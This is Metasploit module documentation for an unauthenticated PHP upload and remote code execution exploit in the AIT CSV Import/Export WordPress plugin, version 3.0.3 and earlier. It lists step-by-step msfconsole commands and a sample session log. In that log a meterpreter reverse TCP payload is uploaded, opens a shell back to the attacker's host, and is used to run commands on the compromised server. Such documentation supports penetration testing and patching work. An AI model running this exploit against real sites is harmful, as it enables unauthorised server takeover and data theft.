## Vulnerable Application

The AIT CSV Import/Export plugin <= 3.0.3 allows unauthenticated
remote attackers to upload and execute arbitrary PHP code. The
`upload-handler` does not require authentication, nor validates the
uploaded content. It may return an error when attempting to parse a
CSV, however the uploaded shell is left. The shell is uploaded to
`wp-content/uploads/`.

The plugin is not free and can be downloaded from https://www.ait-themes.club/wordpress-plugins/csv-import-export/.
Once uploaded, the plugin does NOT need to be activated to be exploitable, just installed.

## Verification Steps

1. Install the plugin
1. Start msfconsole
1. Do: `use exploits/multi/http/wp_ait_csv_rce`
1. Do: `set rhost [ip]`
1. Do: `set lhost [ip]`
1. Do: `run`
1. You should get a shell.

## Options

## Scenarios

### AIT CSV Import / Export 3.0.3 on Wordpress 5.4.4 running on Ubuntu 20.04.

```
[*] Processing ait.rb for ERB directives.
resource (ait.rb)> use exploits/multi/http/wp_ait_csv_rce
[*] Using configured payload php/meterpreter/reverse_tcp
resource (ait.rb)> set rhost 2.2.2.2
rhost => 2.2.2.2
resource (ait.rb)> set lhost 1.1.1.1
lhost => 1.1.1.1
resource (ait.rb)> check
[*] 2.2.2.2:80 - The target appears to be vulnerable.
resource (ait.rb)> run
[*] Started reverse TCP handler on 1.1.1.1:4444 
[*] Executing automatic check (disable AutoCheck to override)
[+] The target appears to be vulnerable.
[*] Uploading payload: W1I6X0.php
[*] Triggering payload
[*] Sending stage (39282 bytes) to 2.2.2.2
[*] Meterpreter session 1 opened (1.1.1.1:4444 -> 2.2.2.2:41504) at 2021-01-01 11:56:16 -0500
[+] Deleted W1I6X0.php

meterpreter > getuid
Server username: www-data (33)
meterpreter > sysinfo
Computer    : wordpress2004
OS          : Linux wordpress2004 5.4.0-52-generic #57-Ubuntu SMP Thu Oct 15 10:57:00 UTC 2020 x86_64
Meterpreter : php/linux
```